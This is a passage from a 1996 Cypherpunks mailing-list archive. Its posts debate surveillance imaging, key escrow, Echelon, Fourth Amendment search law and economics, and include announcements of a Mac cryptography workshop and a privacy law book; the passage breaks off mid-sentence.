Vincent Cate   vince@offshore.com.ai  http://www.offshore.com.ai/vince/
Offshore Information Services         http://www.offshore.com.ai/




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Sat, 17 Aug 1996 11:59:16 +0800
To: cypherpunks@toad.com
Subject: Re: Stealth Buildings Was Re: "X-Ray Gun" for imperceptible searches
Message-ID: <ae3a68680e0210043016@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain


At 8:58 PM 8/16/96, Alan Horowitz wrote:
>TIm, a layer of tin foil is not the same as a professionally installed
>and maintained Faraday cage.
>
>I can envision circulating currents on the tinfoil. Ie, ground loop type
>of situation.
>
>All imaging is depenmdant upon the target having some radiating
>characteristic. If the gun shields a gun-shaped peice of the body from
>radiating in millimeter waves, you can build a gun detector.

There's no other way to say this: you simply don't know what you're talking
about. Your protestations to the contrary, reconstruction of an image from
point sources of leakage is essentially impossible ("the phase problem").

Analyze the solutions for sources behind screens. (A simple model is to
analyze the radiation patterns one one side of conducting plate, with
various sources on the other side.)

For an intuitively visualizable model, consider a pattern of some sort
(like a gun) behind a screen, with light leaking around the edges. (The
less light leaks, the more the example is similar to the case of deliberate
shielding of RF sources, but even the simple example here makes the point.)

This is what crystallographers and DNA analysts call "the phase problem."
Spatial frequency (pattern) information is indeterminate.

If you still believe what you say, that a gun can be imaged even when
behind a conducting screen, based solely on leakage around the edges (or
similar small leaks), I challenge you to produce a paper which demonstrates
this, or, even better, an actual demonstration.

--Tim May

Boycott "Big Brother Inside" software!
We got computers, we're tapping phone lines, we know that that ain't allowed.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
Licensed Ontologist         | black markets, collapse of governments.
"National borders aren't even speed bumps on the information superhighway."








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: mpd@netcom.com (Mike Duvos)
Date: Sat, 17 Aug 1996 11:23:41 +0800
To: cypherpunks@toad.com
Subject: Re: $10K offer if you can break the code
In-Reply-To: <960816191509_387010260@emout12.mail.aol.com>
Message-ID: <199608170104.SAA14968@netcom13.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


> MMMmmmm.... Money!

Don't cash the check yet.  It's security by obscurity using the
highest quality "unpublished algorithms" and up to a 48 byte
key phrase.  

He's only willing to send out the free version by return snail 
mail - no Net access.  Any crack you submit must also decrypt
other messages they will feed it, must be completely documented,
and any prize awards are at their sole descretion. 

He's also selling the high performance "9600 Baud" version for
$100.  

--
     Mike Duvos         $    PGP 2.6 Public Key available     $
     mpd@netcom.com     $    via Finger.                      $





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: David Lesher <wb8foz@nrk.com>
Date: Sat, 17 Aug 1996 10:07:24 +0800
To: cypherpunks@toad.com (Cypherpunks)
Subject: LEO, was Floating....
Message-ID: <199608162206.SAA04256@nrk.com>
MIME-Version: 1.0
Content-Type: text



The biggest obstacle to LEO/ 'anywhere phones' is in fact the
local PTT's. Not only do they fear loss of control [how do you
'cut the wires' as you raid a rebel village?] but as important,
they fear loss of monopoly income on IDDD.




-- 
A host is a host from coast to coast.................wb8foz@nrk.com
& no one will talk to a host that's close........[v].(301) 56-LINUX
Unless the host (that isn't close).........................pob 1433
is busy, hung or dead....................................20915-1433




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Robert Hettinga <rah@shipwright.com>
Date: Sat, 17 Aug 1996 10:14:56 +0800
To: cypherpunks@toad.com
Subject: Announcement: Mac-Crypto Conference Sept 5-6, 1996
Message-ID: <v03007802ae3aa98d0147@[206.119.69.46]>
MIME-Version: 1.0
Content-Type: text/plain


        The Membership of the Mac-Crypto List invites you to

                               The
                           First-Ever-
                           Last-Minute-
                         Under-the-Radar-
                Ask-Forgiveness-but-Not-Permission

                           Macintosh
                Cryptography and Internet Commerce
                 Software Development Workshop


                      September 5 & 6, 1996
              Apple R&D Campus, Cupertino, CA, USA

            This is a free workshop, but we'd *really*
               like it if you register (see below).



SOME INVITED SPEAKERS


Martin Minow
Tim Dierks
Marshall Clow
Kay Guyer
Will Price
John Callas
Quinn
Sari Harrison
Vinnie Moscaritolo
Bob Hettinga
Lucky Green
Kee Nethery
...and the inevitable mystery speakers...

(If you find your name on this list, and we haven't gotten ahold of you, you're
 invited to speak ;-).)

(Also, if you're not on this list and you should be,
 you're invited to speak too!)


WORKSHOP TOPICS:

Introductions and overviews:

   Introduction to crypto technology, what is it who are the players.

   Introduction to electronic commerce and finacial cryptography

   How to use electronic commerce technology today

   Opportunities for the Mac

Tech stuff:

   How to write internet software on the Mac

   Random number / password generation on the Mac (the key to strong crypto)

   Password management and the Mac

   Intenet Config - the next generation,  working group

   Secure networking

Open Sessions:

   We scheduled lots of time for developer demos and open discussions.

     ...and plenty of time for developers to network with Apple.

We have also left time open for last-minute speakers.  If you would like to
present a paper or give a talk, please contact Vinnie Moscaritolo at
<mailto:vinnie@apple.com>.


For more details and registration:

<http://webstuff.apple.com/~opentpt/crypto.html>

The workshop is free. Please register now, though.


Local Hotels:

Cupertino Inn, 800-222-4828
        Pretty much Across the Street.

Cupertino Courtyard by Marriot, 800-321-2211
        5 Minute Drive

Inn at Saratoga
        408-867-5020
        About 3 Miles



See you in Cupertino on September 5th and 6th!

Vinnie Moscaritolo
Apple Developer Tech Support
http://www.vmeng.com/vinnie/
Fingerprint: 4FA3298150E404F2782501876EA2146A




-----------------
Robert Hettinga (rah@shipwright.com)
e$, 44 Farquhar Street, Boston, MA 02131 USA
"'Bart Bucks' are not legal tender."
                -- Punishment, 100 times on a chalkboard,
                       for Bart Simpson
The e$ Home Page: http://www.vmeng.com/rah/






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Sat, 17 Aug 1996 12:48:47 +0800
To: cypherpunks@toad.com
Subject: Re: National Socio-Economic Security Need for Encryption Technology
Message-ID: <ae3a726c0f0210048a6d@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain


At 8:12 PM 8/16/96, Bart  Croughs wrote:
>I have thought a bit more about the question I asked a couple of days ago:
>how can you proof that investment of American capital abroad wouldn't
>lower the standard of living in the US? So far, I didn't receive a
>convincing answer to this question. Maybe I'm wrong, but I think I may
>have a proof. It's a so-called 'reductio ad absurdum'. It goes like this:
...["proof" elided]...

(By the way, Bart, the verb form is "prove," the noun form is "proof")

Others have shown how meaningless your repeated calls for a proof are, as
so many assumptions must be carefully spelled out.

To give an example of how hard the situation is to analyze, consider the
computer and chip industries. (If you argue that your "theorem" is for
nations in the aggregate, and not any particular companies or even
industries, then I will maintain that my example holds pretty much true for
automobiles, pharmaceuticals, chemicals, and so on._

The computer and chip industries move certain investments abroad, to
Malaysia, the Phillipines, Indonesia, Mexico, and so forth. But by moving
these investments abroad, they believe their net market size,
profitability, shareholder value, etc., will be enhanced. Else they
wouldn't do it.

Multiply this by all the industries....

Now, would "the economy" be "better off" if Intel, say, had not moved
assembly operations to Malaysia in the 1970s? Perhaps Intel would now be
bankrupt and gone, as so many of its rivals of the time are now gone and
barely remembered.

You see the problem? Who can say what "better off" is, given that we can't
run history down alternate paths as an experiment.

Your one-track mind is truly astounding. We've had kooks and oddballs on
the list before, but never one who has written a dozen or more posts asking
the same ill-phrased question over and over again.

Give it up. Move on to something else. Or at least take your problem to
another list.

--Tim May


Boycott "Big Brother Inside" software!
We got computers, we're tapping phone lines, we know that that ain't allowed.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
Licensed Ontologist         | black markets, collapse of governments.
"National borders aren't even speed bumps on the information superhighway."








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Scottauge@aol.com
Date: Sat, 17 Aug 1996 10:44:37 +0800
To: lalone@teleweb.net
Subject: $10K offer if you can break the code
Message-ID: <960816191509_387010260@emout12.mail.aol.com>
MIME-Version: 1.0
Content-Type: text/plain


MMMmmmm.... Money!

>  Big Brother is reading your e-mail.  The POUCH will protect you.
>   Win $10,000 in our break the code contest.  No purchase necessary.
>   Free software.  See web page http://www.flagler.com/security.html
>   





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bart  Croughs <bart.croughs@tip.nl>
Date: Sat, 17 Aug 1996 07:47:36 +0800
To: "'cypherpunks@toad.com>
Subject: Re: National Socio-Economic Security Need for Encryption Technology
Message-ID: <01BB8BAF.679B76C0@groningen08.pop.tip.nl>
MIME-Version: 1.0
Content-Type: text/plain


I have thought a bit more about the question I asked a couple of days ago: how can you proof that investment of American capital abroad wouldn't lower the standard of living in the US? So far, I didn't receive a convincing answer to this question. Maybe I'm wrong, but I think I may have a proof. It's a so-called 'reductio ad absurdum'. It goes like this:

"If it would be bad for the standard of living of American citizens when American capital is invested in foreign countries, then it would also be bad for the standard of living of citizens of any American state when capital in this state would be invested in another state. After all, when the negative effect of investing American capital abroad on the standard of living of American citizens outweighs the positive effect, there seems to be no good reason why this would be any different on the level of states within the US. Why would it be bad for American citizens when American capital leaves the country, and at the same time be good for citizens in Arkansas when capital leaves Arkansas?
But if this reasoning is correct, then it would also be bad for the standard of living of citizens of any American city when the capital in this city would be invested in another city. Etcetera. 
This conclusion is clearly absurd, so the original statement that it would be bad for the standard of living of American citizens when American capital is invested in a foreign country, must also be wrong. 


Bart Croughs




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bart  Croughs <bart.croughs@tip.nl>
Date: Sat, 17 Aug 1996 07:51:18 +0800
To: "'cypherpunks@toad.com>
Subject: Re: National Socio-Economic Security Need for Encryption Technology
Message-ID: <01BB8BAF.6ED65AE0@groningen08.pop.tip.nl>
MIME-Version: 1.0
Content-Type: text/plain


Sandy Sandfort wrote:

>On Tue, 13 Aug 1996, Bart Croughs wrote:

>> You claim that I must show that foreign capital investment
>> will not flow back to US workers. But in my original post, I
>>said:
> 
>> "Of course there are advantages also for the US (shareholders
>> will get higher returns, trade will increase), but how can you
>> proof that these advantages will offset the disadvantage of the
>> lowered amount of capital in the US? "
> 
>> You haven't answered this question yet. I don't claim that the
>> U.S. is worse off when US capital moves abroad. I only ask: how
>> can you proof that the US isn't worse off when US capital moves
>> abroad?

>The movement of capital from the US was an *assumption* in Bart's
>argument.  He has done nothing to show that it would in fact
>happen.  When he proves that, they it would be reasonable to
>expect me to offer proof that foreign capital will flow to the US.

So you are saying that no American capital is invested overseas? That would be a remarkable claim. But maybe you mean that I assume that there is a *net* movement of capital from the US to other countries. That is, you think that I assume that more US capital is invested in foreign countries, than there is capital invested from foreign countries in the US. But I don't assume this. I just assume that *some* American capital is invested overseas. That's enough for my question to be relevant. And even if there is absolutely no American capital invested abroad, there is still the question for other countries: if investors in country A decide to invest their capital abroad, how can you proof that this wouldn't have a negative impact on the standard of living of the workers in country A? 

>While I'm sure per capita capital investment is a *factor* in 
>determining how high wages are, it certainly is not the only
>factor.  It appears that Bart has fixated on this one to the
>exclusion of other (probably more important) factors.

For my argument to work, it really doesn't matter *how* important the amount of capital invested is in determining wages. My argument works the moment that you agree that, other things being equal, the higher the amount of capital invested in a country, the higher the wages will be in that country.

Bart Croughs







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "E. ALLEN SMITH" <EALLENSMITH@ocelot.Rutgers.EDU>
Date: Sat, 17 Aug 1996 11:27:11 +0800
To: rre-maintainers@weber.ucsd.edu
Subject: Re: c|net reports UK partial usenet ban
Message-ID: <01I8CU97BQUK9JD8SE@mbcl.rutgers.edu>
MIME-Version: 1.0
Content-Type: text/plain


	A more precise URL is
http://www.cnet.com/Content/News/Files/0,16,2181,00.html. There's a link to a
copy of the original letter. It looks like the UK police are coming down with
delusions of grandeur; they want to eliminate the newsgroups in question from
the Internet/Usenet period, not just block them from the UK. People may want to
look out for cancel messages for these groups coming from the UK, for instance,
and ignore the lot of them.
	-Allen

From:	IN%"m5@vail.tivoli.com"  "Mike McNally" 16-AUG-1996 20:07:15.62
To:	IN%"cypherpunks@toad.com"
CC:	
Subj:	c|net reports UK partial usenet ban

UK Metropolitan Police Service bans smutty newsgroups.  See it all
at <http://www.cnet.com>.

______c_________________________________________________________________
Mike M Nally * Tiv^H^H^H IBM * Austin TX * For the time being,
       m5@tivoli.com * m101@io.com       *    
      <URL:http://www.io.com/~m101>      * three heads and eight arms.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Vladimir Z. Nuri" <vznuri@netcom.com>
Date: Sat, 17 Aug 1996 14:10:18 +0800
To: cypherpunks@toad.com
Subject: forthcoming book on privacy
Message-ID: <199608170342.UAA04850@netcom22.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain



------- Forwarded Message

From: Phil Agre <pagre@weber.ucsd.edu>
To: rre@weber.ucsd.edu
Subject: New Privacy Book


=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
This message was forwarded through the Red Rock Eater News Service (RRE).
Send any replies to the original author, listed in the From: field below.
You are welcome to send the message along to others but please do not use
the "redirect" command.  For information on RRE, including instructions
for (un)subscribing, send an empty message to  rre-help@weber.ucsd.edu
=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=

Date:       Thu, 08 Aug 96 15:03:12 EST
From: Computer Privacy Digest Moderator  <comp-privacy@uwm.edu>

Computer Privacy Digest Thu, 08 Aug 96              Volume 9 : Issue: 009

- - ----------------------------------------------------------------------

Date: 08 Aug 1996 10:12:56 -0400 (EDT)
From: Robert Gellman <rgellman@cais.com>
Subject: New Privacy Book

There is a new book on privacy due out momentarily.  The publisher's
announcement follows.

Bob

The Michie Company Introduces Data Privacy Law: A Study of United
States Data Protection by  Paul M. Schwartz and Joel R. Reidenberg

Data Privacy Law: A Study of United States Data Protection is the first
book to analyze comprehensively U.S. fair information practices law as
it pertains to data protection issues in both the public and private
sectors.

Data Privacy Law was underwritten by the European Commission in
preparation for the issuance of its Directive 95/46/EC (October 24,
1995) on the protection of individuals with regard to the processing of
personal data and on the free movement of such data.   The book
compares coherently the fair information practices of the United States
with principles common to divergent legal systems.

Data Privacy Law has important practical applications and will help
companies that employ transborder telecommunications, conduct
interjurisdictional financial transactions, or advertise across borders
to define their own data protection strategies to ensure that
expectations of fair information practices are met.  The book will
assist lawyers, government regulators and scholars to understand data
flows in both the public and private sectors.

Author Paul M. Schwartz, Professor of Law at the University of Arkansas
School of Law (Fayetteville), has been a guest professor at the
University of Nantes, a Fulbright Senior Lecturer at the Goethe
University?s Research Center for Data Protection, and a Research Fellow
of the Alexander von Humboldt Foundation and of the Harry Guggenheim
Foundation.  He has provided advice and testimony to governmental
bodies in the United States and Europe.
 At present, he serves as Special Advisor to a study of health care
applications of the National Information Infrastructure carried out by
the National Academy of Science's National Research Council.

Author Joel R. Reidenberg is Associate Professor of Law at Fordham
University School of Law.  He serves as chair of the Section on
Computers and Law of the Association of American Law Schools and is a
Fellow of the Cyberspace Law Institute.  Formerly, he practiced in the
Washington, D.C. office of Debevoise & Plimpton, where he worked with
the international telecommunications group on European
telecommunications liberalization and competition law issues, data
protection regulation, and intellectual property issues.  Professor
Reidenberg served as an advisor to the U.S. Congress Office of
Technology Assessment and has testified on information privacy before
various government bodies.

Both authors have written and lectured extensively on privacy and
information technology law.

Priced at $90.00, this book will be a welcome resource for policy
makers, legal practitioners and scholars grappling with data protection
issues.

Michie is a part of LEXIS*-NEXIS* and publishes annotated state codes
for 31 states and the District of Columbia, more than 700 titles
covering national and state law topics, the Michie?s Law on Disc CD-ROM
research system for 36 states, and a growing number of ?practice?
CD-ROM titles.  A division of Reed Elsevier, Inc., and a member of the
Reed Elsevier plc group, one of the world?s leading publishing and
information businesses, Michie combines almost two centuries of
traditional legal publishing with leading-edge information technology.

- - --
Data Privacy Law by Paul M. Schwartz and Joel R.
Reidenberg $90.00 Order Number:  67180-10

For more information or to order, call Michie toll-free at 
800-562-1197. Visit Michie's web site at http://www.michie.com.


- - ------------------------------

End of Computer Privacy Digest V9 #009
******************************


- ------- End of Forwarded Message


------- End of Forwarded Message





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Vladimir Z. Nuri" <vznuri@netcom.com>
Date: Sat, 17 Aug 1996 14:08:53 +0800
To: cypherpunks@toad.com
Subject: "world communications being monitored"
Message-ID: <199608170344.UAA05092@netcom22.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain



------- Forwarded Message
From: "Mat Guthrie" <matguthrie@enterprise.net>
To: mmlist-l@newciv.org
Date: Wed, 14 Aug 1996 20:14:39 +0000
Subject: All Int' Communications Are Monitored


- - ->  SearchNet's   snetnews   Mailing List

Hi there all,

I heard an amazing news report on the radio today, that confirmed
what I've heard and suspected for a long time - all international
communications *are* continually being monitored!!

The report was on "The World at One" news report on BBC Radio 4 -
about as respected, reliable and informative a source as any
mainstream media is ever likely to be. The feature spoke about a
book that's come out in New Zealand called "Secret Power" by Nicky
Hager, that has been endorsed by the former (?) Prime Minister of New
Zealand himself. It supposedly goes into great detail about an
international agreement called "Echelon" of which the US, UK,
France, New Zealand, Australia and several other nations are all
participants. According to Nicky Hager - who was interviewed on the
program - a system of monitoring stations have been set up in various
countries in the world that continually monitor ALL fax, email,
telephone and satellite communications etc, "sniffing" for keywords
using super computers. When these key words are identified the
information is automatically logged and according to Hager, sent
directly to the US intelligence services.

Now whilst many of us have undoubtedly come across this sort of
information before and undoubtedly many of us have probably scoffed
at such ascertions as merely impossible and blatantly paranoid,
something very significant sets this report apart. Before the book
was published, Hager went with his manuscript to the New Zealand
Prime Minister who had been responsible for signing NZ up to the
agreement (I got the impression that he is no longer in power). 
Anyway, the PM was so shocked by the revelations that the book 
contained, that he has written the forward to the book. Supposedly he 
says that he had no idea of the true nature of the agreement and the 
powers which it bestowed on the intelligence services and is 
obviously trying to distance himself from the storm that's beginning 
to brew up about it. Maybe he's just covering his arse or maybe he 
was just another puppet head of government who wasn't properly 
informed about what was really taking place in his own country, but 
either way, the fact that he has got involved with the book adds 
considerable credibility to it's claims. Those of you who have often 
said that such wide-scale monitoring is "obviously impossible" might 
be wise to re-evaluate your positions!

Anyway, there was no further report on the BBC Radio 4 evening news 
and nothing about it on TV, so maybe that's all we're hear about it 
over here in the UK - and maybe even less for you lot in the good old 
US of A. The book isn't in print over here, so needless to say, I'll 
be contacting a book seller over in New Zealand to see if I can get 
myself a copy and I'll keep you informed. If anyone out there in NZ could 
give me a phone number of a sizeable book shop over there, I'd really 
appreciate it and if anyone else has any info on this, please pass it 
on.

I wonder if "Secret Power" is now on their keyword list?  If it is 
then - "Hi there big bro'. I hope you're all having a nice day!"<g>

Take care out there,
      See ya

           Mat

                 ================================================
                 WHAT'S THE FUTURE GOT IN STORE FOR MANKIND???
                                      For a different perspective on:
                 Global Trends, The Environment, Surveillance Technologies,
                                  Current Events and Prophecy, Visit:
                             http://homepages.enterprise.net/matguthrie/
                   THIS PAGE IS CURRENTLY UNDER CONSTRUCTION
                 ===============================================     

                  He who is conscious of danger creates peace for himself;
                  he who takes things lightly creates his own downfall.
                                                                    I Ching 






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: rednax <rednax@asiapac.net>
Date: Sat, 17 Aug 1996 00:48:05 +0800
To: sryan@reading.com
Subject: Re:NT remailer
Message-ID: <199608161308.VAA05385@gandalf.asiapac.net>
MIME-Version: 1.0
Content-Type: text/plain


Speaking of NT, I downloaded the full version of msie 3.0 the other day but
when I tried installing it, an error message came up saying that it requires
a Win95 or WinNT4.0 build of 1381 or higher. I am currently running NT 4.0b
that has a build of 1314, does anyone know of where is the upgrade or
service packs(if available)? I have tried looking around microsoft.com, but
they neither provided any detail nor did they provide an e-mail.

Thanks.

r 3 |) |\| @ ><

"it's aliiiiIIIVVEeee!!!"
----------------
r 3 |) |\| @ ><
----------------
"everyone's expendable, anything too"





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: rednax <rednax@asiapac.net>
Date: Sat, 17 Aug 1996 00:28:36 +0800
To: cypherpunks@toad.com
Subject: RE: email bombing
Message-ID: <199608161308.VAA05387@gandalf.asiapac.net>
MIME-Version: 1.0
Content-Type: text/plain



With reference to se7en's incident, is it because of implications like that
that Up Yours doesn't work?


r 3 |) |\| @ ><

"huh??"

----------------
r 3 |) |\| @ ><
----------------
"everyone's expendable, anything too"





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: shamrock@netcom.com (Lucky Green)
Date: Sat, 17 Aug 1996 14:57:20 +0800
To: rednax <sryan@reading.com
Subject: Re:NT remailer
Message-ID: <v02120d03ae3af6d9cf45@[192.0.2.1]>
MIME-Version: 1.0
Content-Type: text/plain


At 21:08 8/16/96, rednax wrote:
>Speaking of NT, I downloaded the full version of msie 3.0 the other day but
>when I tried installing it, an error message came up saying that it requires
>a Win95 or WinNT4.0 build of 1381 or higher. I am currently running NT 4.0b
>that has a build of 1314, does anyone know of where is the upgrade or
>service packs(if available)? I have tried looking around microsoft.com, but
>they neither provided any detail nor did they provide an e-mail.

USENET?

Just a thought,


-- Lucky Green <mailto:shamrock@netcom.com> PGP encrypted mail preferred.
   Defeat the Demopublican Unity Party. Vote no on Clinton/Dole in November.
   Vote Harry Browne for President.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bill Stewart <stewarts@ix.netcom.com>
Date: Sat, 17 Aug 1996 15:15:10 +0800
To: cypherpunks@toad.com
Subject: Re: key escrow idea from David Staelin of MIT Lincoln Labs
Message-ID: <199608170506.WAA17213@toad.com>
MIME-Version: 1.0
Content-Type: text/plain


Matt Blaze posted Ron Rivest's summary of Dave Staelin's 
suggestion for a different type of Government Access to Keys (GAK) policy,
and Rivest's proposed variant and analysis, and there's been
some discussion on the Cypherpunks list, including the usual
"GAK is evil, period", plus commentary on the variations.
Below I suggest a variant on Ron's variant that's less evil,
though less desireable to the government than Ron's.

R(S)>Here is Staelin's idea:
R(S)>	(1) You can use any crypto you want, but you must keep a record
R(S)>	    of the crypto keys you used.
R(S)>	(2) The government can ask for the crypto keys later, if they have
R(S)>	    a court order, just as they can ask for any of your other papers
R(S)>	    or documents.  You must give the key(s) to them, just as you
R(S)>       must turn over your private papers in such a situation.

For technical reasons, this is a non-starter.  Storing keys requires memory,
and many practical cryptosystems need to generate large numbers of keys, 
or run in environments such as cellphones and password-calculators that
don't _have_ any available memory.  Storing lots of keys implies a high
probability of losing lots of keys, and Matt's talked about the difficulty
of storing keys securely.  Non-technically, as was discussed,
US citizens aren't required to keep personal papers or documents,
though businesses are required to keep some tax and rule-compliance records,
and taxpayers who want to claim deductions need to keep relevant records.

Ron's trusted third party variant:
R>In a variant of Staelin's proposal (my twist) you could append to each
R>encrypted message an encrypted form of the message key.  The
R>encryption could be with the public-key of a trusted third party who
R>will not (and legally may not) reveal the message key without
R>notifying you first (or ensuring that you have been appropriately
R>served with the corresponding warrant).  For example, the ACLU might

Stewart's untrusted first party variants:
Why a trusted _third_ party?  I don't trust third parties with my calls.
Have the sender generate, and keep, a Master Key, and append the
session key encrypted with the Master Key.  As with Staelin's method,
the government can subpoena or warrant the master key.
(So you can call it a Self-Incrimination Key if you like.)

If you use a public key for the SIK, there's the time and space
required to do public-key encryption, but the session keys for 
each session can be decrypted separately by the sender, and verified
by the court, without needing to turn over the private key.

If you use a secret key for the SIK, it's fast and small,
though the SIK needs to be protected and one subpoena decrypts all 
conversations made with the key (as does a warrant seizing the phone.)
(It's basically Clipper with the user instead of NSA generating master keys,
and the user instead of the Friends Of The NSA storing them.)

An intermediate is to use a secret SIK for a small-to-medium
number of sessions, and public-key Master SIK used to generate
an encrypted SIK sent with each message as well as the 
SIK-encrypted session key.  It's still bulky, like the full public-key
version, but not as slow, since you can generate and encrypt
secret-SIK keys off-line.

As with Staelin's proposal, mine also doesn't give the government
real-time access, only after-the-fact access, but it doesn't
have most of the technical difficulties of secure, reliable used-key 
storage (hmmm - sounds kind of like a sharps-box for used needles :-)

R>CONCLUSION
R>The fundamental idea is to give the government a right to access
R>encrypted communication in return for a guarantee that access may not
R>be obtained until there is BOTH proper legal authorization AND proper
R>prior notice to (at least one of) the communicants.
R>Is this workable??

As Matt says:
M>While Ron's twist decreases some of the burden on the user it
M>eliminates the main benefit of the Staelin proposal - that one
M>cannot obtain cleartext without the knowledge of at least one party.

Agreed - while Ron's proposal asserts that the TTP is forbidden
to reveal the key to the government without also telling the owner,
current government wiretap laws often require just the opposite,
and even if the government initially changed their policy to
require TTPs to tell users, they could rapidly change back.
The only way to guarantee that prior notice (or post-access notice)
is for the protocol to require the user's participation, 
which inherently makes it non-real-time and gives the user the
ability to refuse (at whatever cost.)

Also, "to give the government a right to access" implies that they
don't have that right today (which I agree with but Louis Freeh doesn't),
and that we _should_ give them that right when we don't have to
(which Dorothy Denning would agree with but I don't) and that a 
Trusted Government Guarantee (TGG) is a good enough payment in return.

And if you retain the word "voluntary", as used by Ron, you need to 
convince a Bad Guy or an Innocent Guy to believe a TGG or TTP -
Bad Guys won't, and Innocent Guys, as Ed Meese said, "usually 
aren't suspects", so it's still no-win for the government.


#			Thanks;  Bill
# Bill Stewart, +1-415-442-2215 stewarts@ix.netcom.com
# <A HREF="http://idiom.com/~wcs"> 	Reassign Authority!





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jim Choate <ravage@einstein.ssz.com>
Date: Sat, 17 Aug 1996 13:48:28 +0800
To: cypherpunks@toad.com
Subject: Re: [NOISE] "X-Ray Gun" for imperceptible searches (fwd)
Message-ID: <199608170314.WAA11946@einstein>
MIME-Version: 1.0
Content-Type: text



Forwarded message:

> Date: Fri, 16 Aug 1996 11:34:44 -0400 (EDT)
> From: Black Unicorn <unicorn@schloss.li>
> Subject: Re: [NOISE] "X-Ray Gun" for imperceptible searches (fwd)

> > Simple actualy. The police don't need a warrant to collect such information
> > because it is in the public domain (ie not private and therefor requiring
> > a search warrant and probable cause). Therefore anybody (not just cops)
> > can pick it up.
> 
> This argument breaks down when one looks at the difference between state
> action and private action.

Constitutionaly, if we are discussing search warrants there is no
difference. The 4th gives the courts no latitude on how to treat police and
'normal' citizens. They must be treated equaly.

> Were one to follow this logic, it would come to pass that citizens could
> get warants to search neighbor's residences.

Since when are police any different than citizens? Where are the police
mentioned in the Constitution? (hint: their not) If we are speaking of
Constitutional issues police have no powers that a ordinary citizen doesn't.
The Constitution has many directives to Courts about what they may do and how
they may do it. It at no point covers police other than the section dealing
with treasury enforcement. I would contend that citizens have exactly the same
rights and privileges as police. In fact if the general citizenry is
prohibited something (eg own a fully auto gun) then the police also are
prohibited from it. I would further hold that if it is illegal for me to
carry a gun on my hip then a police officer should also be prohibited. The
whole concept of 'citizens arrest' is based on this Constitutional premise.
It has been eroded over the years because it is a clear threat to those who
have a profit to make off our government and their mis-use of it.

Under some conditions they are allowed exactly this. Last year I had a
friend go through a divorce. As part of the agreement he was to retain
possession of some guns and other memorabilia. The wife refused to let the
husband come onto the property or contact their son. He was placed under a
bond to that effect. When he went to the judge my friend was allowed to
search the property for those items. He was advised that if he met any
resistance to contact the Sheriff's office who would then arrest the wife
for contempt of court. It is up to the court, not the police, to decide who
is an officer of the court and why. The judge was able to specificaly
list the items and had probable cause in that the material was not the wifes
but rather the husbands. To allow her to keep them would constitute state
sanctioned theft. The court could not use a police officer because they are
not empowered to enforce civil decree's. Refusal to abide by the civil
decree would constitute a criminal act and the court could then require the
police to intercede.

The 4th is a directive to courts on when they may issue search warrants. Who
executes them is covered (via the 9th and 10th) by state and local law (per
extension by the 14th).
 
			       ARTICLE IV. 
 
	The right of the people to be secure in their persons, houses, 
papers, and effects, against unreasonable searches and seizures, shall 
not be violated, and no Warrants shall issue, but upon probable cause, 
supported by Oath or affirmation, and particularly describing the place 
to be searched, and the persons or things to be seized. 
 
> > It is becoming more and more popular for governments to limit the ability
> > of scanners and other such detectors to pick up information supposedly 
> > to protect privacy. The above states that if it is eminating from the
> > residence (and by extension person) and is picked up off their property,
> > perhaps on or in public space then it is fair game.
> 
> Fair game for law enforcement use and can be presented in court, yes.

But police have no Constitutional right to search anything, courts do. In no
way can the Constitution be honestly extended to allow police the right to
search anyone until directed by a court.

> And, I might add, there is a different standard for voice communications
> however carried.  The heat from a indoor pot garden is a different matter,
> and incidently, the matter on which the question was presented.

I have to disagree. The issue is not what is being carried on the medium but
rather can I measure that medium without a warrant if I am a officer of the
court or empowered by law as the police. Implicit in this question is the
fact that my goal is to gather information to be presented to a court for
legal action against the party being monitored. This was a strawman that the
court fell for, the defence attorney didn't understand the technology either.

To argue that if I measure some quantity and no modulation is present I may
present that as evidence, but if modulation is present then I need a warrant
to even measure it is ludicrous and screams 'alterior motive'. I would say
that the argument of the state of the light (ie on/off) is modulation and
therefore may be extended to limit unwarranted measurement.

So, all I need to do is to modulate the IR lamps with a commen radio. Then
they can watch all they want with cameras and such. No warrant, no evidence.
Do you figure X-10 modulation would qualify? Wouldn't the on/off caused by
the AC power qualify as modulation of the light?

> > States such as N. Carolina (per extension via the 14th) should be 
> > prohibited from regulating or otherwise controlling possesion and use
> > of radar detectors (in this case) which are currently illegal for
> > private persons to operate.
> 
> There is the additional matter of the obstruction of justice issues..

Obstruction of what justice? The goal is to keep the speed down so people
